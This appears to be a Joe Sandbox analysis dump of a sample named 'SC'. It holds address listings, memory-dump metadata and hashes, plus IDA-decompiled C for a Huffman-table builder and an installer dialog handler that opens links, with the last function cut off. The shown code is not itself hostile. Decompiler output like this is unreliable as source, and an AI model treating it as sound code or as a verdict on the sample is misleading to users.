                                  0x0040681b
                                  0x0040681e
                                  0x00406824
                                  0x00406829
                                  0x0040682f
                                  0x00406835
                                  0x00406837
                                  0x0040683a
                                  0x00406843
                                  0x00406849
                                  0x00406849
                                  0x0040683c
                                  0x0040683e
                                  0x00406840
                                  0x00406840
                                  0x0040684b
                                  0x00406851
                                  0x00406853
                                  0x00406856
                                  0x00406858
                                  0x0040685e
                                  0x00406860
                                  0x00406862
                                  0x00406864
                                  0x00406866
                                  0x00406869
                                  0x00406872
                                  0x00406875
                                  0x00406875
                                  0x0040686b
                                  0x0040686b
                                  0x0040686e
                                  0x0040686e
                                  0x00406869
                                  0x00406860
                                  0x00406877
                                  0x00406879
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406879
                                  0x004067f8
                                  0x004067f8
                                  0x004067fe
                                  0x00406804
                                  0x00406806
                                  0x00000000
                                  0x00000000
                                  0x00406808
                                  0x00406808
                                  0x0040680a
                                  0x0040680c
                                  0x00406815
                                  0x00406815
                                  0x0040680e
                                  0x0040680e
                                  0x00406811
                                  0x00406811
                                  0x00406817
                                  0x00406819
                                  0x00000000
                                  0x00000000
                                  0x0040687f
                                  0x0040687f
                                  0x00406884
                                  0x00406886
                                  0x00406887
                                  0x00406888
                                  0x00406889
                                  0x0040688f
                                  0x00406892
                                  0x00406895
                                  0x00406898
                                  0x0040689a
                                  0x004068a0
                                  0x004068a0
                                  0x004068a3
                                  0x004068a3
                                  0x004068a3
                                  0x004068a3
                                  0x004068ac
                                  0x00000000
                                  0x00000000
                                  0x004068b1
                                  0x004068b1
                                  0x004068b4
                                  0x004068b7
                                  0x004068b9
                                  0x00406950
                                  0x00406950
                                  0x00406953
                                  0x00406955
                                  0x00406956
                                  0x00406957
                                  0x0040695a
                                  0x00000000
                                  0x0040695a
                                  0x004068bf
                                  0x004068bf
                                  0x004068c5
                                  0x004068c7
                                  0x004068ec
                                  0x004068ef
                                  0x004068f5
                                  0x004068fa
                                  0x00406900
                                  0x00406906
                                  0x00406908
                                  0x0040690b
                                  0x00406914
                                  0x0040691a
                                  0x0040691a
                                  0x0040690d
                                  0x0040690f
                                  0x00406911
                                  0x00406911
                                  0x0040691c
                                  0x00406922
                                  0x00406924
                                  0x00406927
                                  0x00406929
                                  0x0040692f
                                  0x00406931
                                  0x00406933
                                  0x00406935
                                  0x00406937
                                  0x0040693a
                                  0x00406943
                                  0x00406946
                                  0x00406946
                                  0x0040693c
                                  0x0040693c
                                  0x0040693f
                                  0x0040693f
                                  0x0040693a
                                  0x00406931
                                  0x00406948
                                  0x0040694a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040694a
                                  0x004068c9
                                  0x004068c9
                                  0x004068cf
                                  0x004068d5
                                  0x004068d7
                                  0x00000000
                                  0x00000000
                                  0x004068d9
                                  0x004068d9
                                  0x004068db
                                  0x004068dd
                                  0x004068e4
                                  0x004068e4
                                  0x004068e6
                                  0x004068df
                                  0x004068df
                                  0x004068e1
                                  0x004068e1
                                  0x004068e8
                                  0x004068ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406962
                                  0x00406962
                                  0x00406965
                                  0x00406967
                                  0x0040696a
                                  0x0040696d
                                  0x0040696d
                                  0x0040696d
                                  0x0040696d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040601b
                                  0x00405fff
                                  0x00000000
                                  0x00406005
                                  0x00406008
                                  0x00406012
                                  0x00406015
                                  0x00406018
                                  0x00000000
                                  0x00406018
                                  0x00405fff
                                  0x00406023
                                  0x00406026
                                  0x0040602a
                                  0x00406034
                                  0x0040603e
                                  0x00406041
                                  0x00406047
                                  0x0040617b
                                  0x0040617d
                                  0x00406183
                                  0x00406186
                                  0x00406189
                                  0x00000000
                                  0x00406189
                                  0x0040604d
                                  0x0040604d
                                  0x0040604e
                                  0x004060a6
                                  0x004060a6
                                  0x004060ad
                                  0x00406153
                                  0x00406153
                                  0x00406158
                                  0x0040615b
                                  0x00406160
                                  0x00406163
                                  0x00406168
                                  0x0040616b
                                  0x00406170
                                  0x00406173
                                  0x00406173
                                  0x00000000
                                  0x004060b3
                                  0x004060b3
                                  0x004060b3
                                  0x004060b3
                                  0x004060b7
                                  0x004060b7
                                  0x004060d9
                                  0x004060dc
                                  0x004060de
                                  0x004060e1
                                  0x004060e6
                                  0x004060bc
                                  0x004060bc
                                  0x004060c1
                                  0x004060c3
                                  0x004060c5
                                  0x004060ca
                                  0x004060d0
                                  0x004060d5
                                  0x004060d7
                                  0x004060d7
                                  0x004060cc
                                  0x004060cc
                                  0x004060cc
                                  0x004060ca
                                  0x00000000
                                  0x004060e8
                                  0x00406115
                                  0x0040611a
                                  0x0040611c
                                  0x0040611d
                                  0x0040611f
                                  0x00406120
                                  0x00406120
                                  0x00406120
                                  0x00406148
                                  0x0040614d
                                  0x0040614d
                                  0x00000000
                                  0x0040614d
                                  0x004060e6
                                  0x004060ad
                                  0x00406050
                                  0x00406050
                                  0x00406051
                                  0x0040609b
                                  0x00000000
                                  0x0040609b
                                  0x00406053
                                  0x00406054
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004061b0
                                  0x004061b0
                                  0x004061b0
                                  0x004061b3
                                  0x00000000
                                  0x00000000
                                  0x00406190
                                  0x00406190
                                  0x00406194
                                  0x00000000
                                  0x00000000
                                  0x0040619a
                                  0x0040619a
                                  0x0040619d
                                  0x004061a0
                                  0x004061a5
                                  0x004061a7
                                  0x004061aa
                                  0x004061ad
                                  0x004061ad
                                  0x004061ad
                                  0x004061b5
                                  0x004061b5
                                  0x004061b8
                                  0x004061ba
                                  0x004061bf
                                  0x004061c2
                                  0x004061c4
                                  0x004061c7
                                  0x00000000
                                  0x00000000
                                  0x004061cd
                                  0x004061cd
                                  0x004061cf
                                  0x00000000
                                  0x00000000
                                  0x004061d5
                                  0x004061d5
                                  0x004061d9
                                  0x00000000
                                  0x00000000
                                  0x004061df
                                  0x004061df
                                  0x004061e2
                                  0x004061e4
                                  0x00406282
                                  0x00406282
                                  0x00406285
                                  0x00406287
                                  0x00406287
                                  0x0040628a
                                  0x0040628d
                                  0x0040628f
                                  0x00406291
                                  0x00406293
                                  0x00406293
                                  0x0040629c
                                  0x004062a1
                                  0x004062a4
                                  0x004062a7
                                  0x004062aa
                                  0x004062ad
                                  0x004062ad
                                  0x004062ad
                                  0x004062b0
                                  0x004062b6
                                  0x004062b6
                                  0x004062bc
                                  0x004062bc
                                  0x004062bc
                                  0x00000000
                                  0x004062b0
                                  0x004061ea
                                  0x004061ea
                                  0x004061f0
                                  0x004061f3
                                  0x004061f5
                                  0x00406220
                                  0x00406223
                                  0x00406229
                                  0x0040622e
                                  0x00406234
                                  0x0040623a
                                  0x0040623c
                                  0x0040623f
                                  0x00406248
                                  0x0040624e
                                  0x0040624e
                                  0x00406241
                                  0x00406243
                                  0x00406245
                                  0x00406245
                                  0x00406250
                                  0x00406256
                                  0x00406259
                                  0x0040625b
                                  0x0040625d
                                  0x00406263
                                  0x00406265
                                  0x00406267
                                  0x0040626a
                                  0x00406273
                                  0x00406273
                                  0x00406275
                                  0x0040626c
                                  0x0040626c
                                  0x0040626f
                                  0x0040626f
                                  0x00406277
                                  0x00406277
                                  0x00406265
                                  0x0040627a
                                  0x0040627c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040627c
                                  0x004061f7
                                  0x004061f7
                                  0x004061fd
                                  0x00406203
                                  0x00406205
                                  0x00000000
                                  0x00000000
                                  0x00406207
                                  0x00406207
                                  0x00406209
                                  0x0040620b
                                  0x0040620e
                                  0x00406215
                                  0x00406215
                                  0x00406217
                                  0x00406210
                                  0x00406210
                                  0x00406212
                                  0x00406212
                                  0x00406219
                                  0x0040621b
                                  0x0040621e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406322
                                  0x00406325
                                  0x00406328
                                  0x0040632e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406505
                                  0x00406505
                                  0x00406505
                                  0x00406508
                                  0x0040650b
                                  0x0040650d
                                  0x00406510
                                  0x00406516
                                  0x0040651d
                                  0x0040651f
                                  0x00000000
                                  0x00000000
                                  0x004063f3
                                  0x004063f3
                                  0x0040641b
                                  0x0040641b
                                  0x0040641b
                                  0x0040641d
                                  0x00000000
                                  0x00000000
                                  0x004063fb
                                  0x004063fb
                                  0x004063ff
                                  0x00000000
                                  0x00000000
                                  0x00406405
                                  0x00406405
                                  0x00406408
                                  0x0040640b
                                  0x0040640e
                                  0x00406410
                                  0x00406412
                                  0x00406415
                                  0x00406418
                                  0x00406418
                                  0x00406418
                                  0x0040641f
                                  0x0040641f
                                  0x00406427
                                  0x0040642a
                                  0x00406430
                                  0x00406433
                                  0x00406437
                                  0x0040643b
                                  0x0040643e
                                  0x00406441
                                  0x00406459
                                  0x00406459
                                  0x0040645c
                                  0x0040646a
                                  0x0040646d
                                  0x0040645e
                                  0x0040645e
                                  0x00406460
                                  0x00406467
                                  0x00406467
                                  0x00406496
                                  0x00406496
                                  0x00406496
                                  0x00406499
                                  0x0040649b
                                  0x00000000
                                  0x00000000
                                  0x00406476
                                  0x00406476
                                  0x0040647a
                                  0x00000000
                                  0x00000000
                                  0x00406480
                                  0x00406480
                                  0x00406483
                                  0x00406486
                                  0x00406489
                                  0x0040648b
                                  0x0040648d
                                  0x00406490
                                  0x00406493
                                  0x00406493
                                  0x00406493
                                  0x0040649d
                                  0x0040649d
                                  0x0040649f
                                  0x004064a1
                                  0x004064ac
                                  0x004064af
                                  0x004064b2
                                  0x004064b4
                                  0x004064b6
                                  0x004064b8
                                  0x004064bb
                                  0x004064be
                                  0x004064c3
                                  0x004064c6
                                  0x004064c9
                                  0x004064cc
                                  0x004064d3
                                  0x004064d6
                                  0x004064d8
                                  0x00000000
                                  0x00000000
                                  0x004064de
                                  0x004064de
                                  0x004064e2
                                  0x004064f3
                                  0x004064f3
                                  0x004064f3
                                  0x004064f5
                                  0x004064f5
                                  0x004064f9
                                  0x004064f9
                                  0x004064f9
                                  0x004064fb
                                  0x004064fc
                                  0x004064ff
                                  0x004064ff
                                  0x004064ff
                                  0x00406502
                                  0x00000000
                                  0x00406502
                                  0x004064e4
                                  0x004064e4
                                  0x004064e7
                                  0x00000000
                                  0x00000000
                                  0x004064ed
                                  0x004064ed
                                  0x00000000
                                  0x004064ed
                                  0x00406443
                                  0x00406443

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4fc2fbc5f6b99236c8936bb3f40f7556cf5b2ae230672f798b05916fdef3cfd4
                                  • Instruction ID: 56cab3a0066612c98e3784cfed28ffc4187101fd674252aedfa605d01fc3a8fa
                                  • Opcode Fuzzy Hash: 4fc2fbc5f6b99236c8936bb3f40f7556cf5b2ae230672f798b05916fdef3cfd4
                                  • Instruction Fuzzy Hash: FEE17AB1900709DFDB24CF98C880BAABBF5EB45305F15852EE897A76D1D338AA51CF14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406A9A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                  				signed int _v8;
                                  				unsigned int _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				intOrPtr* _v32;
                                  				signed int* _v36;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				intOrPtr _v48;
                                  				intOrPtr _v52;
                                  				void _v116;
                                  				signed int _v176;
                                  				signed int _v180;
                                  				signed int _v240;
                                  				signed int _t166;
                                  				signed int _t168;
                                  				intOrPtr _t175;
                                  				signed int _t181;
                                  				void* _t182;
                                  				intOrPtr _t183;
                                  				signed int* _t184;
                                  				signed int _t186;
                                  				signed int _t187;
                                  				signed int* _t189;
                                  				signed int _t190;
                                  				intOrPtr* _t191;
                                  				intOrPtr _t192;
                                  				signed int _t193;
                                  				signed int _t195;
                                  				signed int _t200;
                                  				signed int _t205;
                                  				void* _t207;
                                  				short _t208;
                                  				signed char _t222;
                                  				signed int _t224;
                                  				signed int _t225;
                                  				signed int* _t232;
                                  				signed int _t233;
                                  				signed int _t234;
                                  				void* _t235;
                                  				signed int _t236;
                                  				signed int _t244;
                                  				signed int _t246;
                                  				signed int _t251;
                                  				signed int _t254;
                                  				signed int _t256;
                                  				signed int _t259;
                                  				signed int _t262;
                                  				void* _t263;
                                  				void* _t264;
                                  				signed int _t267;
                                  				intOrPtr _t269;
                                  				intOrPtr _t271;
                                  				signed int _t274;
                                  				intOrPtr* _t275;
                                  				unsigned int _t276;
                                  				void* _t277;
                                  				signed int _t278;
                                  				intOrPtr* _t279;
                                  				signed int _t281;
                                  				intOrPtr _t282;
                                  				intOrPtr _t283;
                                  				signed int* _t284;
                                  				signed int _t286;
                                  				signed int _t287;
                                  				signed int _t288;
                                  				signed int _t296;
                                  				signed int* _t297;
                                  				intOrPtr _t298;
                                  				void* _t299;
                                  
                                  				_t278 = _a8;
                                  				_t187 = 0x10;
                                  				memset( &_v116, 0, _t187 << 2);
                                  				_t189 = _a4;
                                  				_t233 = _t278;
                                  				do {
                                  					_t166 =  *_t189;
                                  					_t189 =  &(_t189[1]);
                                  					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                  					_t233 = _t233 - 1;
                                  				} while (_t233 != 0);
                                  				if(_v116 != _t278) {
                                  					_t279 = _a28;
                                  					_t267 =  *_t279;
                                  					_t190 = 1;
                                  					_a28 = _t267;
                                  					_t234 = 0xf;
                                  					while(1) {
                                  						_t168 = 0;
                                  						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                  							break;
                                  						}
                                  						_t190 = _t190 + 1;
                                  						if(_t190 <= _t234) {
                                  							continue;
                                  						}
                                  						break;
                                  					}
                                  					_v8 = _t190;
                                  					if(_t267 < _t190) {
                                  						_a28 = _t190;
                                  					}
                                  					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                  						_t234 = _t234 - 1;
                                  						if(_t234 != 0) {
                                  							continue;
                                  						}
                                  						break;
                                  					}
                                  					_v28 = _t234;
                                  					if(_a28 > _t234) {
                                  						_a28 = _t234;
                                  					}
                                  					 *_t279 = _a28;
                                  					_t181 = 1 << _t190;
                                  					while(_t190 < _t234) {
                                  						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                  						if(_t182 < 0) {
                                  							L64:
                                  							return _t168 | 0xffffffff;
                                  						}
                                  						_t190 = _t190 + 1;
                                  						_t181 = _t182 + _t182;
                                  					}
                                  					_t281 = _t234 << 2;
                                  					_t191 = _t299 + _t281 - 0x70;
                                  					_t269 =  *_t191;
                                  					_t183 = _t181 - _t269;
                                  					_v52 = _t183;
                                  					if(_t183 < 0) {
                                  						goto L64;
                                  					}
                                  					_v176 = _t168;
                                  					 *_t191 = _t269 + _t183;
                                  					_t192 = 0;
                                  					_t235 = _t234 - 1;
                                  					if(_t235 == 0) {
                                  						L21:
                                  						_t184 = _a4;
                                  						_t271 = 0;
                                  						do {
                                  							_t193 =  *_t184;
                                  							_t184 =  &(_t184[1]);
                                  							if(_t193 != _t168) {
                                  								_t232 = _t299 + _t193 * 4 - 0xb0;
                                  								_t236 =  *_t232;
                                  								 *((intOrPtr*)(0x42ce38 + _t236 * 4)) = _t271;
                                  								 *_t232 = _t236 + 1;
                                  							}
                                  							_t271 = _t271 + 1;
                                  						} while (_t271 < _a8);
                                  						_v16 = _v16 | 0xffffffff;
                                  						_v40 = _v40 & 0x00000000;
                                  						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                  						_t195 = _v8;
                                  						_t186 =  ~_a28;
                                  						_v12 = _t168;
                                  						_v180 = _t168;
                                  						_v36 = 0x42ce38;
                                  						_v240 = _t168;
                                  						if(_t195 > _v28) {
                                  							L62:
                                  							_t168 = 0;
                                  							if(_v52 == 0 || _v28 == 1) {
                                  								return _t168;
                                  							} else {
                                  								goto L64;
                                  							}
                                  						}
                                  						_v44 = _t195 - 1;
                                  						_v32 = _t299 + _t195 * 4 - 0x70;
                                  						do {
                                  							_t282 =  *_v32;
                                  							if(_t282 == 0) {
                                  								goto L61;
                                  							}
                                  							while(1) {
                                  								_t283 = _t282 - 1;
                                  								_t200 = _a28 + _t186;
                                  								_v48 = _t283;
                                  								_v24 = _t200;
                                  								if(_v8 <= _t200) {
                                  									goto L45;
                                  								}
                                  								L31:
                                  								_v20 = _t283 + 1;
                                  								do {
                                  									_v16 = _v16 + 1;
                                  									_t296 = _v28 - _v24;
                                  									if(_t296 > _a28) {
                                  										_t296 = _a28;
                                  									}
                                  									_t222 = _v8 - _v24;
                                  									_t254 = 1 << _t222;
                                  									if(1 <= _v20) {
                                  										L40:
                                  										_t256 =  *_a36;
                                  										_t168 = 1 << _t222;
                                  										_v40 = 1;
                                  										_t274 = _t256 + 1;
                                  										if(_t274 > 0x5a0) {
                                  											goto L64;
                                  										}
                                  									} else {
                                  										_t275 = _v32;
                                  										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                  										if(_t222 >= _t296) {
                                  											goto L40;
                                  										}
                                  										while(1) {
                                  											_t222 = _t222 + 1;
                                  											if(_t222 >= _t296) {
                                  												goto L40;
                                  											}
                                  											_t275 = _t275 + 4;
                                  											_t264 = _t263 + _t263;
                                  											_t175 =  *_t275;
                                  											if(_t264 <= _t175) {
                                  												goto L40;
                                  											}
                                  											_t263 = _t264 - _t175;
                                  										}
                                  										goto L40;
                                  									}
                                  									_t168 = _a32 + _t256 * 4;
                                  									_t297 = _t299 + _v16 * 4 - 0xec;
                                  									 *_a36 = _t274;
                                  									_t259 = _v16;
                                  									 *_t297 = _t168;
                                  									if(_t259 == 0) {
                                  										 *_a24 = _t168;
                                  									} else {
                                  										_t276 = _v12;
                                  										_t298 =  *((intOrPtr*)(_t297 - 4));
                                  										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                  										_a5 = _a28;
                                  										_a4 = _t222;
                                  										_t262 = _t276 >> _t186;
                                  										_a6 = (_t168 - _t298 >> 2) - _t262;
                                  										 *(_t298 + _t262 * 4) = _a4;
                                  									}
                                  									_t224 = _v24;
                                  									_t186 = _t224;
                                  									_t225 = _t224 + _a28;
                                  									_v24 = _t225;
                                  								} while (_v8 > _t225);
                                  								L45:
                                  								_t284 = _v36;
                                  								_a5 = _v8 - _t186;
                                  								if(_t284 < 0x42ce38 + _a8 * 4) {
                                  									_t205 =  *_t284;
                                  									if(_t205 >= _a12) {
                                  										_t207 = _t205 - _a12 + _t205 - _a12;
                                  										_v36 =  &(_v36[1]);
                                  										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                  										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                  									} else {
                                  										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                  										_t208 =  *_t284;
                                  										_v36 =  &(_t284[1]);
                                  									}
                                  									_a6 = _t208;
                                  								} else {
                                  									_a4 = 0xc0;
                                  								}
                                  								_t286 = 1 << _v8 - _t186;
                                  								_t244 = _v12 >> _t186;
                                  								while(_t244 < _v40) {
                                  									 *(_t168 + _t244 * 4) = _a4;
                                  									_t244 = _t244 + _t286;
                                  								}
                                  								_t287 = _v12;
                                  								_t246 = 1 << _v44;
                                  								while((_t287 & _t246) != 0) {
                                  									_t287 = _t287 ^ _t246;
                                  									_t246 = _t246 >> 1;
                                  								}
                                  								_t288 = _t287 ^ _t246;
                                  								_v20 = 1;
                                  								_v12 = _t288;
                                  								_t251 = _v16;
                                  								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                  									L60:
                                  									if(_v48 != 0) {
                                  										_t282 = _v48;
                                  										_t283 = _t282 - 1;
                                  										_t200 = _a28 + _t186;
                                  										_v48 = _t283;
                                  										_v24 = _t200;
                                  										if(_v8 <= _t200) {
                                  											goto L45;
                                  										}
                                  										goto L31;
                                  									}
                                  									break;
                                  								} else {
                                  									goto L58;
                                  								}
                                  								do {
                                  									L58:
                                  									_t186 = _t186 - _a28;
                                  									_t251 = _t251 - 1;
                                  								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                  								_v16 = _t251;
                                  								goto L60;
                                  							}
                                  							L61:
                                  							_v8 = _v8 + 1;
                                  							_v32 = _v32 + 4;
                                  							_v44 = _v44 + 1;
                                  						} while (_v8 <= _v28);
                                  						goto L62;
                                  					}
                                  					_t277 = 0;
                                  					do {
                                  						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                  						_t277 = _t277 + 4;
                                  						_t235 = _t235 - 1;
                                  						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                  					} while (_t235 != 0);
                                  					goto L21;
                                  				}
                                  				 *_a24 =  *_a24 & 0x00000000;
                                  				 *_a28 =  *_a28 & 0x00000000;
                                  				return 0;
                                  			}
                                  0x00406d48
                                  0x00406d48
                                  0x00406d52
                                  0x00406d57
                                  0x00406d5f
                                  0x00406d5b
                                  0x00406d5d
                                  0x00406d5d
                                  0x00406d65
                                  0x00406d67
                                  0x00406d6e
                                  0x00406d78
                                  0x00406d82
                                  0x00406d9e
                                  0x00406da2
                                  0x00406be7
                                  0x00406bed
                                  0x00406bee
                                  0x00406bf0
                                  0x00406bf6
                                  0x00406bf9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bf9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406d84
                                  0x00406d84
                                  0x00406d84
                                  0x00406d89
                                  0x00406d92
                                  0x00406d9b
                                  0x00000000
                                  0x00406d9b
                                  0x00406da8
                                  0x00406da8
                                  0x00406dab
                                  0x00406db2
                                  0x00406db5
                                  0x00000000
                                  0x00406bd8
                                  0x00406b58
                                  0x00406b5a
                                  0x00406b5a
                                  0x00406b5e
                                  0x00406b61
                                  0x00406b62
                                  0x00406b62
                                  0x00000000
                                  0x00406b5a
                                  0x00406ace
                                  0x00406ad4
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58af5f5ecf814c7bfbd6a218695ae9f924359dc2dc729b1f607b39268f316727
                                  • Instruction ID: 2cd64b44fdb598fc6d7be2f0130c20f4249908d1a9472bfe36cd3babe412fd90
                                  • Opcode Fuzzy Hash: 58af5f5ecf814c7bfbd6a218695ae9f924359dc2dc729b1f607b39268f316727
                                  • Instruction Fuzzy Hash: F7C15C71A00219CBDF14CF64C4905EDB7B2FF99314F26826AD856BB384D734A952CF94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E00403FF1(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                  				char* _v8;
                                  				signed int _v12;
                                  				void* _v16;
                                  				struct HWND__* _t52;
                                  				intOrPtr _t71;
                                  				intOrPtr _t85;
                                  				long _t86;
                                  				int _t98;
                                  				struct HWND__* _t99;
                                  				signed int _t100;
                                  				signed int _t106;
                                  				intOrPtr _t107;
                                  				intOrPtr _t109;
                                  				int _t110;
                                  				signed int* _t112;
                                  				signed int _t113;
                                  				char* _t114;
                                  				CHAR* _t115;
                                  
                                  				if(_a8 != 0x110) {
                                  					__eflags = _a8 - 0x111;
                                  					if(_a8 != 0x111) {
                                  						L11:
                                  						__eflags = _a8 - 0x4e;
                                  						if(_a8 != 0x4e) {
                                  							__eflags = _a8 - 0x40b;
                                  							if(_a8 == 0x40b) {
                                  								 *0x428fec =  *0x428fec + 1;
                                  								__eflags =  *0x428fec;
                                  							}
                                  							L25:
                                  							_t110 = _a16;
                                  							L26:
                                  							return E00403F0F(_a8, _a12, _t110);
                                  						}
                                  						_t52 = GetDlgItem(_a4, 0x3e8);
                                  						_t110 = _a16;
                                  						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                  						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                  							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                  							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                  								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                  								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                  								_v12 = _t100;
                                  								__eflags = _t100 - _t109 - 0x800;
                                  								_v16 = _t109;
                                  								_v8 = 0x42db40;
                                  								if(_t100 - _t109 < 0x800) {
                                  									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                  									SetCursor(LoadCursorA(0, 0x7f02));
                                  									ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                  									SetCursor(LoadCursorA(0, 0x7f00));
                                  									_t110 = _a16;
                                  								}
                                  							}
                                  						}
                                  						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                  						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                  							goto L26;
                                  						} else {
                                  							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                  							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                  								goto L26;
                                  							}
                                  							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                  								SendMessageA( *0x42eba8, 0x111, 1, 0);
                                  							}
                                  							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                  								SendMessageA( *0x42eba8, 0x10, 0, 0);
                                  							}
                                  							return 1;
                                  						}
                                  					}
                                  					__eflags = _a12 >> 0x10;
                                  					if(_a12 >> 0x10 != 0) {
                                  						goto L25;
                                  					}
                                  					__eflags =  *0x428fec; // 0x0
                                  					if(__eflags != 0) {
                                  						goto L25;
                                  					}
                                  					_t112 =  *0x4297f8 + 0x14;
                                  					__eflags =  *_t112 & 0x00000020;
                                  					if(( *_t112 & 0x00000020) == 0) {
                                  						goto L25;
                                  					}
                                  					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                  					__eflags = _t106;
                                  					 *_t112 = _t106;
                                  					E00403ECA(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                  					E0040427B();
                                  					goto L11;
                                  				} else {
                                  					_t98 = _a16;
                                  					_t113 =  *(_t98 + 0x30);
                                  					if(_t113 < 0) {
                                  						_t107 =  *0x42e37c; // 0x5ac8c7
                                  						_t113 =  *(_t107 - 4 + _t113 * 4);
                                  					}
                                  					_t71 =  *0x42ebd8; // 0x5aba28
                                  					_push( *((intOrPtr*)(_t98 + 0x34)));
                                  					_t114 = _t113 + _t71;
                                  					_push(0x22);
                                  					_a16 =  *_t114;
                                  					_v12 = _v12 & 0x00000000;
                                  					_t115 = _t114 + 1;
                                  					_v16 = _t115;
                                  					_v8 = E00403FBC;
                                  					E00403EA8(_a4);
                                  					_push( *((intOrPtr*)(_t98 + 0x38)));
                                  					_push(0x23);
                                  					E00403EA8(_a4);
                                  					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
